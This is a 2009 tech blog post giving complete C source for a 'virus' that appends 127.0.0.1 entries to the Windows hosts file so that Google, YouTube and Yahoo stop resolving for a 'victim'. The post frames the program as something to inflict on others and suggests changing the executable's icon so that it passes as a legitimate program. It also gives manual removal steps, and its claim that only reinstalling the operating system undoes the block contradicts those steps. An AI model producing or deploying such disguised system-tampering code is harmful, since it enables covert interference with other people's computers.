Translate!!

Subscribe in a reader

Saturday, September 26, 2009

A Virus Program to Block Websites

Buzz It
submit to reddit StumbleUpon

A Virus Program to Block Websites


Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.
NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?
Here is the sourcecode of the virus.
#include
#include
#include

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
How to Compile ?
For step-by-step compilation guide, refer my post How to compile C Programs.
Testing
1. To test, run the compiled module. It will block the sites that is listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
127.0.0.1—————————google.com
5. Delete all such entries which contain the names of blocked sites.
NOTE: You can also change the ICON of the virus to make it look like a legitimate program.This method is described in the post: How to Change the ICON of an EXE file ?

 

No comments:

Post a Comment

Next Next home

RECENT COMMENTS

Grab This Widget

Random posts

 

Powered by FeedBurner

Subscribe to updates
Blog-Watch - The Blog Directory
Computers blogs
googlef97e20b47bd40d74.html
The Link Exchange - Your ultimate resource for link exchange!
Technology Blogs - Blog Rankings
Computers Blogs
GoLedy.com
Blog Directory
Technology Blogs - Blog Rankings
Blog Directory
Blog Directory
Listed in LS Blogs the Blog Directory and Blog Search Engine

I'm in

I'm in
Reddit [Mithun Mohan]

Follow me in twitter

Follow me in twitter
[Brilliant Computing]

See me in Delicious

See me in Delicious
Mithun Mohan

Find me in stumble upon

Find me in stumble upon
[Mithun Mohan]

Lets become friends in digg

Lets become friends in digg
[Brilliant Computing]

The Brilliant Computing community in Orkut

VISITORS

   
MyFreeCopyright.com Registered & Protected

TERMS AND CONDITIONS

Dear Visitors...
This blog does not contain uploaded files on the server but only provides direct links to download files.Navigate the links provided at your own risk.If any problem occurs like broken link or something or virus then you can contact me via 'Contact Me' found on top of this blog so that I can change the link.Dont hesitate to comment.If Any request or suggestions plz contact me.
DO THE HACKS POSTED HERE AT YOUR OWN RISK.
Thankyou for visiting my blog............enjoy

Protected by Copyscape Plagiarism Detector
function rtclickcheck(keyp){ if (navigator.appName == "Netscape" && keyp.which == 3){ alert(message); return false; } if (navigator.appVersion.indexOf("MSIE") != -1 && event.button == 2) { alert(message); return false; } } document.onmousedown = rtclickcheck;

Brilliant Computing Copyright © 2009 Brilliant Computing is Designed by Ipietoon Sponsored by Online Business Journal

Creative Commons License
Brilliant computing by Mithun is licensed under a Creative Commons Attribution-Noncommercial 2.5 India License.